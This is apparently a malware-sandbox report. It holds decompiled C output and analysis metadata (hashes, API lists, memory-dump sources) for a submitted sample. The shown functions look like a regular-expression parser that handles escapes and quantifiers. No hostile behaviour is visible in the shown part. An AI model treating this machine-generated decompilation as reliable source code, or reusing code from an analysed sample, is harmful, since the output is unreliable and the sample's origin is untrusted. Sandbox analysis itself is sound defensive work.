                                                    																 *((intOrPtr*)(_t403 - 0x10)) = _t202;
                                                    																 *((char*)(_t403 - 0x14)) = _t309 & 0xffffff00 | _t202 != 0x00000000;
                                                    																E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    																_t312 = _t403 - 0x14;
                                                    															} else {
                                                    																_t319 =  *_t399;
                                                    																_t212 = E00409B0F(_t198, _t319,  &(_t401[4]));
                                                    																 *((intOrPtr*)(_t403 - 0x10)) = _t212;
                                                    																 *((char*)(_t403 - 0x14)) = _t319 & 0xffffff00 | _t212 != 0x00000000;
                                                    																E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    																_t312 = _t403 - 0x14;
                                                    															}
                                                    															goto L6;
                                                    														} else {
                                                    															_t322 =  &(_t401[4]);
                                                    															 *_t302 = _t197 + 1;
                                                    															_t217 = E00409BC5(_t401, 0x5c,  *_t399, _t322);
                                                    															 *((intOrPtr*)(_t403 - 0x10)) = _t217;
                                                    															 *((char*)(_t403 - 0x14)) = _t322 & 0xffffff00 | _t217 != 0x00000000;
                                                    															E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    															_t325 = _t403 - 0x14;
                                                    															goto L57;
                                                    														}
                                                    													} else {
                                                    														_t326 =  &(_t401[4]);
                                                    														 *_t302 = _t197 + 1;
                                                    														_t223 = E00409BC5(_t401, 9,  *_t399, _t326);
                                                    														 *((intOrPtr*)(_t403 - 0x10)) = _t223;
                                                    														 *((char*)(_t403 - 0x14)) = _t326 & 0xffffff00 | _t223 != 0x00000000;
                                                    														E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    														_t325 = _t403 - 0x14;
                                                    														goto L57;
                                                    													}
                                                    												} else {
                                                    													_t329 =  &(_t401[4]);
                                                    													 *_t302 = _t197 + 1;
                                                    													_t228 = E00409BC5(_t401, 0xd,  *_t399, _t329);
                                                    													 *((intOrPtr*)(_t403 - 0x10)) = _t228;
                                                    													 *((char*)(_t403 - 0x14)) = _t329 & 0xffffff00 | _t228 != 0x00000000;
                                                    													E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    													_t325 = _t403 - 0x14;
                                                    													goto L57;
                                                    												}
                                                    											} else {
                                                    												_t332 =  &(_t401[4]);
                                                    												 *_t302 = _t197 + 1;
                                                    												_t233 = E00409BC5(_t401, 0xa,  *_t399, _t332);
                                                    												 *((intOrPtr*)(_t403 - 0x10)) = _t233;
                                                    												 *((char*)(_t403 - 0x14)) = _t332 & 0xffffff00 | _t233 != 0x00000000;
                                                    												E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    												_t325 = _t403 - 0x14;
                                                    												goto L57;
                                                    											}
                                                    										} else {
                                                    											_t335 =  &(_t401[4]);
                                                    											 *_t302 = _t197 + 1;
                                                    											_t238 = E00409BC5(_t401, 0xc,  *_t399, _t335);
                                                    											 *((intOrPtr*)(_t403 - 0x10)) = _t238;
                                                    											 *((char*)(_t403 - 0x14)) = _t335 & 0xffffff00 | _t238 != 0x00000000;
                                                    											E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    											_t325 = _t403 - 0x14;
                                                    											goto L57;
                                                    										}
                                                    									} else {
                                                    										_t338 =  &(_t401[4]);
                                                    										 *_t302 = _t197 + 1;
                                                    										_t243 = E00409BC5(_t401, 7,  *_t399, _t338);
                                                    										 *((intOrPtr*)(_t403 - 0x10)) = _t243;
                                                    										 *((char*)(_t403 - 0x14)) = _t338 & 0xffffff00 | _t243 != 0x00000000;
                                                    										E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    										_t325 = _t403 - 0x14;
                                                    										goto L57;
                                                    									}
                                                    								}
                                                    								 *(_t403 + 0x10) = _t401[0x27];
                                                    								 *0x41720c();
                                                    								 *_t302 =  *_t302 + 1;
                                                    								_t343 =  *_t302;
                                                    								asm("sbb edx, edx");
                                                    								if(( ~( *( *(_t403 + 0x10) + 4)) &  *((intOrPtr*)( *(_t403 + 0x10) + 8)) +  *( *(_t403 + 0x10) + 4)) == _t343) {
                                                    									 *((char*)(_t403 - 0x54)) =  *((intOrPtr*)(_t403 + 0xf));
                                                    									 *0x417230(0);
                                                    									_t401 = "incomplete escape sequence \\c";
                                                    									 *0x417234(_t401, strlen(_t401));
                                                    									_t343 = _t403 - 0xb8;
                                                    									 *(_t403 - 4) = 6;
                                                    									E00404FA7(_t343, _t403 - 0x54);
                                                    									_push(0x4196f8);
                                                    									_push(_t403 - 0xb8);
                                                    									 *((intOrPtr*)(_t403 - 0xb8)) = 0x417698;
                                                    									L004153FE();
                                                    								}
                                                    								_t250 =  *_t343;
                                                    								 *_t302 = _t343 + 1;
                                                    								if(_t250 >= 0x61 && _t250 <= 0x7a) {
                                                    									_t250 =  *0x4172a4(_t250);
                                                    								}
                                                    								_t345 =  *_t399;
                                                    								_t252 = E00409BC5(_t401, _t250 ^ 0x00000040, _t345,  &(_t401[4]));
                                                    								 *((intOrPtr*)(_t403 - 0x10)) = _t252;
                                                    								 *((char*)(_t403 - 0x14)) = _t345 & 0xffffff00 | _t252 != 0x00000000;
                                                    								E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    								_t325 = _t403 - 0x14;
                                                    								goto L57;
                                                    							}
                                                    							 *(_t403 + 8) =  *(_t403 + 8) & 0x00000000;
                                                    							 *(_t403 + 0x13) =  *(_t403 + 0x13) & 0x00000000;
                                                    							 *_t302 = _t197 + 1;
                                                    							while(1) {
                                                    								 *(_t403 + 0x14) = _t401[0x27];
                                                    								 *0x41720c();
                                                    								asm("sbb edx, edx");
                                                    								_t268 =  *_t302;
                                                    								if(( ~( *( *(_t403 + 0x14) + 4)) &  *((intOrPtr*)( *(_t403 + 0x14) + 8)) +  *( *(_t403 + 0x14) + 4)) == _t268) {
                                                    									break;
                                                    								}
                                                    								_t273 =  *_t268;
                                                    								if(_t273 < 0x30 || _t273 > 0x39) {
                                                    									if(_t273 < 0x61 || _t273 > 0x66) {
                                                    										if(_t273 < 0x41 || _t273 > 0x46) {
                                                    											break;
                                                    										} else {
                                                    											goto L30;
                                                    										}
                                                    									} else {
                                                    										goto L30;
                                                    									}
                                                    								} else {
                                                    									L30:
                                                    									_t274 = E00402FBD(_t273);
                                                    									 *(_t403 + 0x13) =  *(_t403 + 0x13) + 1;
                                                    									 *_t302 =  *_t302 + 1;
                                                    									 *(_t403 + 8) = _t274 + ( *(_t403 + 8) << 4);
                                                    									if( *(_t403 + 0x13) < 2) {
                                                    										continue;
                                                    									}
                                                    									break;
                                                    								}
                                                    							}
                                                    							_t354 =  &(_t401[4]);
                                                    							_t270 = E00409BC5(_t401,  *(_t403 + 8),  *_t399, _t354);
                                                    							 *((intOrPtr*)(_t403 - 0x10)) = _t270;
                                                    							 *((char*)(_t403 - 0x14)) = _t354 & 0xffffff00 | _t270 != 0x00000000;
                                                    							E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    							_t325 = _t403 - 0x14;
                                                    							goto L57;
                                                    						}
                                                    						_t360 =  &(_t401[4]);
                                                    						 *_t302 = _t197 + 1;
                                                    						_t278 = E00409BC5(_t401, 0x1b,  *_t399, _t360);
                                                    						 *((intOrPtr*)(_t403 - 0x10)) = _t278;
                                                    						 *((char*)(_t403 - 0x14)) = _t360 & 0xffffff00 | _t278 != 0x00000000;
                                                    						E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    						_t325 = _t403 - 0x14;
                                                    						goto L57;
                                                    					} else {
                                                    						 *((intOrPtr*)(_t403 - 0x28)) = _t197;
                                                    						 *(_t403 + 0x10) = __esi[0x27];
                                                    						 *0x41720c();
                                                    						asm("sbb edx, edx");
                                                    						_t286 = E004090FF(_t403 - 0x28,  ~( *( *(_t403 + 0x10) + 4)) &  *((intOrPtr*)( *(_t403 + 0x10) + 8)) +  *( *(_t403 + 0x10) + 4), 0x3e7);
                                                    						if( *((char*)( *__ebx)) == 0x30 || _t286 >= 0xa && _t286 >= __esi[0xb]) {
                                                    							 *(_t403 + 8) =  *(_t403 + 8) & 0x00000000;
                                                    							 *(_t403 + 0x13) =  *(_t403 + 0x13) & 0x00000000;
                                                    							while(1) {
                                                    								 *(_t403 + 0x14) = _t401[0x27];
                                                    								 *0x41720c();
                                                    								asm("sbb edx, edx");
                                                    								_t291 =  *_t302;
                                                    								if(( ~( *( *(_t403 + 0x14) + 4)) &  *((intOrPtr*)( *(_t403 + 0x14) + 8)) +  *( *(_t403 + 0x14) + 4)) == _t291) {
                                                    									break;
                                                    								}
                                                    								_t371 =  *_t291;
                                                    								if(_t371 >= 0x30 && _t371 <= 0x37) {
                                                    									 *(_t403 + 0x13) =  *(_t403 + 0x13) + 1;
                                                    									 *(_t403 + 8) = ( *(_t403 + 8) - 6 << 3) + _t371;
                                                    									 *_t302 = _t291 + 1;
                                                    									if( *(_t403 + 0x13) < 3) {
                                                    										continue;
                                                    									}
                                                    								}
                                                    								break;
                                                    							}
                                                    							_t368 =  &(_t401[4]);
                                                    							_t293 = E00409BC5(_t401,  *(_t403 + 8),  *_t399, _t368);
                                                    							 *((intOrPtr*)(_t403 - 0x10)) = _t293;
                                                    							 *((char*)(_t403 - 0x14)) = _t368 & 0xffffff00 | _t293 != 0x00000000;
                                                    							E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    							_t325 = _t403 - 0x14;
                                                    							L57:
                                                    							E00406ED3(_t325);
                                                    						} else {
                                                    							_t372 =  *_t399;
                                                    							_t297 = E00409C62(_t286, _t372,  &(_t401[4]));
                                                    							 *((intOrPtr*)(_t403 - 0x10)) = _t297;
                                                    							 *((char*)(_t403 - 0x14)) = _t372 & 0xffffff00 | _t297 != 0x00000000;
                                                    							E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    							E00406ED3(_t403 - 0x14);
                                                    							 *_t302 =  *((intOrPtr*)(_t403 - 0x28));
                                                    						}
                                                    						goto L1;
                                                    					}
                                                    				} else {
                                                    					__ecx =  *__edi;
                                                    					 *__ebx = __eax;
                                                    					__eax = E00409BC5(__esi, __eax,  *__edi, __esi + 4);
                                                    					 *((intOrPtr*)(__ebp - 0x10)) = __eax;
                                                    					__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    					__eax = __ebp - 0x14;
                                                    					 *(__ebp - 0x14) = __cl;
                                                    					__ecx = __ebp - 0x24;
                                                    					__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    					__ecx = __ebp - 0x14;
                                                    					L6:
                                                    					E00406ED3(_t312);
                                                    					 *_t302 =  *_t302 + 1;
                                                    				}
                                                    				L1:
                                                    				if( *((intOrPtr*)(_t403 - 0x20)) != 0) {
                                                    					_push(_t399);
                                                    					_push( *((intOrPtr*)(_t403 - 0x34)));
                                                    					_push(_t302);
                                                    					_push(_t403 - 0x24);
                                                    					E00408D03(_t401);
                                                    					_t211 =  *((intOrPtr*)(_t403 + 0xc));
                                                    					_t317 =  *((intOrPtr*)(_t403 - 0x20));
                                                    					 *(_t403 - 0x24) =  *(_t403 - 0x24) & 0x00000000;
                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x1c)))) = _t317;
                                                    					 *((intOrPtr*)(_t211 + 0x1c)) = _t317 + 4;
                                                    				}
                                                    				 *(_t403 - 4) =  *(_t403 - 4) & 0x00000000;
                                                    				E0040C5ED(_t403 - 0x30);
                                                    				 *(_t403 - 4) =  *(_t403 - 4) | 0xffffffff;
                                                    				E00406ED3(_t403 - 0x24);
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t403 - 0xc));
                                                    				return 1;
                                                    			}
                                                    0x004059ba
                                                    0x004059c0
                                                    0x004059d1
                                                    0x004059da
                                                    0x004059e1
                                                    0x004059e5
                                                    0x004059f0
                                                    0x004059f5
                                                    0x004059f6
                                                    0x00405a00
                                                    0x00405a00
                                                    0x00405a05
                                                    0x00405a0a
                                                    0x00405a0c
                                                    0x00405a16
                                                    0x00405a1c
                                                    0x00405a1d
                                                    0x00405a27
                                                    0x00405a2f
                                                    0x00405a3a
                                                    0x00405a41
                                                    0x00405a46
                                                    0x00000000
                                                    0x00405a46
                                                    0x004058e7
                                                    0x004058eb
                                                    0x004058f0
                                                    0x004058f2
                                                    0x004058f5
                                                    0x004058f8
                                                    0x0040590d
                                                    0x00405911
                                                    0x00405915
                                                    0x00000000
                                                    0x00000000
                                                    0x00405917
                                                    0x0040591b
                                                    0x00405923
                                                    0x0040592b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405931
                                                    0x00405931
                                                    0x00405932
                                                    0x00405940
                                                    0x00405943
                                                    0x00405949
                                                    0x0040594c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040594c
                                                    0x0040591b
                                                    0x00405950
                                                    0x00405958
                                                    0x00405960
                                                    0x0040596b
                                                    0x00405972
                                                    0x00405977
                                                    0x00000000
                                                    0x00405977
                                                    0x004058ac
                                                    0x004058af
                                                    0x004058b7
                                                    0x004058bf
                                                    0x004058ca
                                                    0x004058d1
                                                    0x004058d6
                                                    0x00000000
                                                    0x004057a4
                                                    0x004057a7
                                                    0x004057aa
                                                    0x004057ad
                                                    0x004057c7
                                                    0x004057d0
                                                    0x004057dd
                                                    0x00405822
                                                    0x00405826
                                                    0x0040582a
                                                    0x0040582d
                                                    0x00405830
                                                    0x00405845
                                                    0x00405849
                                                    0x0040584d
                                                    0x00000000
                                                    0x00000000
                                                    0x0040584f
                                                    0x00405854
                                                    0x00405866
                                                    0x0040586e
                                                    0x00405871
                                                    0x00405873
                                                    0x00000000
                                                    0x00000000
                                                    0x00405873
                                                    0x00000000
                                                    0x00405854
                                                    0x00405877
                                                    0x0040587f
                                                    0x00405887
                                                    0x00405892
                                                    0x00405899
                                                    0x0040589e
                                                    0x00405bb7
                                                    0x00405bb7
                                                    0x004057e9
                                                    0x004057e9
                                                    0x004057f1
                                                    0x004057f9
                                                    0x00405804
                                                    0x0040580b
                                                    0x00405813
                                                    0x0040581b
                                                    0x0040581b
                                                    0x00000000
                                                    0x004057dd
                                                    0x00405755
                                                    0x00405755
                                                    0x0040575b
                                                    0x00405762
                                                    0x0040576a
                                                    0x0040576f
                                                    0x00405772
                                                    0x00405775
                                                    0x00405779
                                                    0x0040577c
                                                    0x00405781
                                                    0x00405784
                                                    0x00405784
                                                    0x00405789
                                                    0x00405789
                                                    0x00405321
                                                    0x00405325
                                                    0x00405327
                                                    0x0040532b
                                                    0x00405330
                                                    0x00405331
                                                    0x00405332
                                                    0x00405337
                                                    0x0040533a
                                                    0x0040533d
                                                    0x00405344
                                                    0x00405349
                                                    0x00405349
                                                    0x0040534c
                                                    0x00405353
                                                    0x00405358
                                                    0x0040535f
                                                    0x0040536c
                                                    0x00405374

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: tolowertoupper
                                                    • String ID: incomplete escape sequence \c
                                                    • API String ID: 1080271956-949001438
                                                    • Opcode ID: 39bb49a1a08b3dd777d864a793be88eea520dc48117c4783dab6732a6018448f
                                                    • Instruction ID: 44cb3acf87c3d58dae45ce2b98c07f36b87c2adb796d601b5b08f860e8cdf80f
                                                    • Opcode Fuzzy Hash: 39bb49a1a08b3dd777d864a793be88eea520dc48117c4783dab6732a6018448f
                                                    • Instruction Fuzzy Hash: 1202A0B190064A9FDB15CF64C991AEF77B4EF44304F14406AE852B7281EB78AF14CF66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 33%
                                                    			E00408D03(char* __ecx) {
                                                    				signed int _t104;
                                                    				intOrPtr _t112;
                                                    				void* _t117;
                                                    				void* _t118;
                                                    				void* _t119;
                                                    				void* _t120;
                                                    				signed int _t124;
                                                    				void* _t130;
                                                    				signed int _t134;
                                                    				void* _t140;
                                                    				void* _t148;
                                                    				void* _t149;
                                                    				signed char* _t151;
                                                    				signed int _t164;
                                                    				signed int _t203;
                                                    				void* _t215;
                                                    				intOrPtr _t216;
                                                    				signed char** _t217;
                                                    				char _t221;
                                                    				char _t224;
                                                    				void* _t226;
                                                    				char* _t227;
                                                    				void* _t230;
                                                    
                                                    				L004153D0();
                                                    				_t227 = __ecx;
                                                    				_t216 =  *((intOrPtr*)(__ecx + 0x27));
                                                    				 *0x41720c(_t215, _t226, _t149);
                                                    				_t104 =  *(_t216 + 4);
                                                    				_t217 =  *(_t230 + 0xc);
                                                    				asm("sbb ecx, ecx");
                                                    				if(( ~_t104 &  *((intOrPtr*)(_t216 + 8)) + _t104) !=  *_t217) {
                                                    					_t151 =  *(_t230 + 8);
                                                    					_t104 =  *((intOrPtr*)( *(_t151[4]) + 0x28))();
                                                    					if(_t104 == 0) {
                                                    						_t219 =  *((intOrPtr*)(__ecx + 0x27));
                                                    						 *(_t230 - 0xd) =  *(_t230 - 0xd) & 0x00000000;
                                                    						 *(_t230 - 0x1c) =  *(_t230 - 0x1c) | 0xffffffff;
                                                    						 *(_t230 - 0x14) =  *_t217;
                                                    						 *0x41720c();
                                                    						_t203 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x27)) + 8)) +  *(_t219 + 4);
                                                    						asm("sbb ecx, ecx");
                                                    						_t104 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t219 + 4)) & _t203) - 9;
                                                    						if(_t104 == 0) {
                                                    							L28:
                                                    							 *(_t230 - 0x18) = 1;
                                                    							goto L30;
                                                    						} else {
                                                    							_t117 = _t104 - 1;
                                                    							if(_t117 == 0) {
                                                    								L26:
                                                    								 *(_t230 - 0x18) =  *(_t230 - 0x18) & 0x00000000;
                                                    								goto L31;
                                                    							} else {
                                                    								_t118 = _t117 - 1;
                                                    								if(_t118 == 0) {
                                                    									L24:
                                                    									 *(_t230 - 0x18) =  *(_t230 - 0x18) & 0x00000000;
                                                    									 *(_t230 - 0x1c) = 1;
                                                    									goto L31;
                                                    								} else {
                                                    									_t104 = _t118 - 1;
                                                    									if(_t104 == 0) {
                                                    										 *(_t230 - 0xd) = 1;
                                                    										goto L28;
                                                    									} else {
                                                    										_t119 = _t104 - 1;
                                                    										if(_t119 == 0) {
                                                    											 *(_t230 - 0xd) = 1;
                                                    											goto L26;
                                                    										} else {
                                                    											_t120 = _t119 - 1;
                                                    											if(_t120 == 0) {
                                                    												L23:
                                                    												 *(_t230 - 0xd) = 1;
                                                    												goto L24;
                                                    											} else {
                                                    												_t104 = _t120 - 1;
                                                    												if(_t104 == 0) {
                                                    													 *0x41720c();
                                                    													asm("sbb ecx, ecx");
                                                    													_t124 = E004090FF(_t230 - 0x14,  ~( *(_t227[0x27] + 4)) &  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t227[0x27] + 4), 0xffffffff);
                                                    													_t221 = _t227[0x27];
                                                    													 *(_t230 - 0x18) = _t124;
                                                    													 *0x41720c();
                                                    													_t104 =  *(_t221 + 4);
                                                    													asm("sbb ecx, ecx");
                                                    													if(( ~_t104 &  *((intOrPtr*)(_t221 + 8)) + _t104) !=  *(_t230 - 0x14)) {
                                                    														_t222 = _t227[0x27];
                                                    														 *0x41720c();
                                                    														_t203 =  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t222 + 4);
                                                    														asm("sbb ecx, ecx");
                                                    														_t130 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t222 + 4)) & _t203) - 0x10;
                                                    														if(_t130 == 0) {
                                                    															_t151 =  *(_t230 - 0x14);
                                                    															 *0x41720c();
                                                    															asm("sbb ecx, ecx");
                                                    															_t134 = E004090FF(_t230 - 0x14,  ~( *(_t227[0x27] + 4)) &  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t227[0x27] + 4), 0xffffffff);
                                                    															if( *(_t230 - 0x14) != _t151) {
                                                    																 *(_t230 - 0x1c) = _t134;
                                                    															}
                                                    															_t224 = _t227[0x27];
                                                    															 *0x41720c();
                                                    															_t104 =  *(_t224 + 4);
                                                    															asm("sbb ecx, ecx");
                                                    															if( *(_t230 - 0x14) != ( ~_t104 &  *((intOrPtr*)(_t224 + 8)) + _t104)) {
                                                    																_t225 = _t227[0x27];
                                                    																 *0x41720c();
                                                    																_t203 =  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t225 + 4);
                                                    																asm("sbb ecx, ecx");
                                                    																_t140 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t225 + 4)) & _t203) - 0x11;
                                                    																if(_t140 == 0) {
                                                    																	L21:
                                                    																	_t104 =  *(_t230 - 0x1c);
                                                    																	if(_t104 >=  *(_t230 - 0x18)) {
                                                    																		_t151 =  *(_t230 + 8);
                                                    																		goto L30;
                                                    																	} else {
                                                    																		 *((char*)(_t230 - 0x3c)) =  *((intOrPtr*)(_t230 + 0x13));
                                                    																		 *0x417230(0);
                                                    																		_t227 = "Can\'t do {n, m} with n > m";
                                                    																		 *0x417234(_t227, strlen(_t227));
                                                    																		 *(_t230 - 4) =  *(_t230 - 4) & 0x00000000;
                                                    																		 *0x417218(_t230 - 0x3c);
                                                    																		_push(0x4196f8);
                                                    																		_push(_t230 - 0x58);
                                                    																		 *((intOrPtr*)(_t230 - 0x58)) = 0x417698;
                                                    																		L004153FE();
                                                    																		goto L23;
                                                    																	}
                                                    																} else {
                                                    																	_t104 = _t140 - 1;
                                                    																	if(_t104 == 0) {
                                                    																		 *(_t230 - 0xd) = 1;
                                                    																		goto L21;
                                                    																	}
                                                    																}
                                                    															}
                                                    														} else {
                                                    															_t148 = _t130 - 1;
                                                    															if(_t148 == 0) {
                                                    																L14:
                                                    																_t104 =  *(_t230 - 0x18);
                                                    																 *(_t230 - 0x1c) = _t104;
                                                    																L30:
                                                    																if( *(_t230 - 0x18) != 0xffffffff) {
                                                    																	L31:
                                                    																	if( *((char*)(_t230 + 0x10)) != 0 &&  *(_t230 - 0x1c) > 0x10) {
                                                    																		_t227[0xa] = _t227[0xa] & 0x00000000;
                                                    																	}
                                                    																	_t164 = _t151[4];
                                                    																	_t112 =  *((intOrPtr*)( *_t164 + 0x1c))( *(_t230 - 0x18),  *(_t230 - 0x1c), _t203 & 0xffffff00 |  *(_t230 - 0xd) == 0x00000000,  &(_t227[4]));
                                                    																	 *((intOrPtr*)(_t230 - 0x28)) = _t112;
                                                    																	 *_t151 =  *_t151 & 0x00000000;
                                                    																	 *(_t230 - 0x2c) =  *(_t230 - 0x2c) & 0x00000000;
                                                    																	 *((intOrPtr*)(_t230 - 0x20)) = _t112;
                                                    																	 *((char*)(_t230 - 0x24)) = _t164 & 0xffffff00 | _t112 != 0x00000000;
                                                    																	 *(_t230 - 4) = 1;
                                                    																	E0040BF91(_t151, _t230 - 0x24);
                                                    																	E00406ED3(_t230 - 0x24);
                                                    																	 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
                                                    																	 *( *(_t230 + 0xc)) =  *(_t230 - 0x14);
                                                    																	_t104 = E00406ED3(_t230 - 0x2c);
                                                    																}
                                                    															} else {
                                                    																_t104 = _t148 - 1;
                                                    																if(_t104 == 0) {
                                                    																	 *(_t230 - 0xd) = 1;
                                                    																	goto L14;
                                                    																}
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t230 - 0xc));
                                                    				return _t104;
                                                    			}


                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: Can't do {n, m} with n > m
                                                    • API String ID: 1214428233-227225803
                                                    • Opcode ID: e553ee17eae5ca6cfc6cb64984d613825a92450ef0f053ca12d4eeb828b68aa6
                                                    • Instruction ID: 47e776d1a0f71e80584c51c7b8460619ed49745a926705c7366e66a548d0e101
                                                    • Opcode Fuzzy Hash: e553ee17eae5ca6cfc6cb64984d613825a92450ef0f053ca12d4eeb828b68aa6
                                                    • Instruction Fuzzy Hash: B3919271A0060A9BCF18CF64C554AEEB7B6FB44310F14826EE856A73C0DB78AD51CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _EH_prolog.MSVCRT ref: 00405EEF
                                                    • strlen.MSVCRT ref: 00406065
                                                    • _CxxThrowException.MSVCRT(?,004196F8), ref: 00406096
                                                      • Part of subcall function 0040A5B8: _EH_prolog.MSVCRT ref: 0040A5BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$ExceptionThrowstrlen
                                                    • String ID: quantifier not expected
                                                    • API String ID: 2054561153-3090400379
                                                    • Opcode ID: ffa739ab46cdc785f705dfba8158c4e06e3bd99cb083d143c2a2a728a6b6dcb6
                                                    • Instruction ID: 96f9309febd4b26ccc1dd5471e80c689c957bcaa372d40d9e1b63adb595ee9a0
                                                    • Opcode Fuzzy Hash: ffa739ab46cdc785f705dfba8158c4e06e3bd99cb083d143c2a2a728a6b6dcb6
                                                    • Instruction Fuzzy Hash: 14912975700206DFCB08DF68C8D49AABBB5FF48340B14856AE916DB382DB38E955CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 41%
                                                    			E0040D7A2(void* __ecx) {
                                                    				intOrPtr* _t33;
                                                    				intOrPtr _t34;
                                                    				intOrPtr* _t38;
                                                    				void* _t45;
                                                    				signed int _t46;
                                                    				signed int _t47;
                                                    				intOrPtr* _t49;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t52;
                                                    				intOrPtr _t56;
                                                    				signed int _t59;
                                                    				intOrPtr* _t64;
                                                    				intOrPtr* _t67;
                                                    				intOrPtr _t68;
                                                    				char* _t70;
                                                    				signed int _t71;
                                                    				void* _t73;
                                                    
                                                    				_t45 = __ecx;
                                                    				L004153D0();
                                                    				_t64 =  *((intOrPtr*)(_t73 + 0xc));
                                                    				_t56 =  *((intOrPtr*)(_t64 + 4));
                                                    				_t67 =  *((intOrPtr*)(_t56 + 4));
                                                    				_t33 =  *_t67;
                                                    				if(_t67 != _t33) {
                                                    					while(1) {
                                                    						_t71 =  *(_t45 + 8);
                                                    						if(_t71 <  *((intOrPtr*)(_t33 + 8))) {
                                                    							goto L3;
                                                    						}
                                                    						 *(_t45 + 8) = _t71 + 1;
                                                    						_t33 =  *_t33;
                                                    						if( *((intOrPtr*)(_t56 + 4)) != _t33) {
                                                    							continue;
                                                    						}
                                                    						goto L3;
                                                    					}
                                                    				}
                                                    				L3:
                                                    				_t34 =  *_t64;
                                                    				_t68 =  *((intOrPtr*)(_t34 + 4));
                                                    				if(_t68 != 0) {
                                                    					_t59 =  *((intOrPtr*)(_t34 + 8)) - _t68 >> 2;
                                                    				} else {
                                                    					_t59 = 0;
                                                    				}
                                                    				_t46 =  *(_t45 + 8);
                                                    				if(_t46 >= _t59) {
                                                    					 *((char*)(_t73 - 0x24)) =  *((intOrPtr*)(_t73 + 0xb));
                                                    					 *0x417230(0);
                                                    					_t70 = "reference to nonexistent group";
                                                    					 *0x417234(_t70, strlen(_t70));
                                                    					 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
                                                    					_t46 = _t73 - 0x40;
                                                    					 *0x417218(_t73 - 0x24);
                                                    					_t34 = _t73 - 0x40;
                                                    					_push(0x4196f8);
                                                    					_push(_t34);
                                                    					 *(_t73 - 0x40) = 0x417698;
                                                    					L004153FE();
                                                    				}
                                                    				_t47 = _t46 << 2;
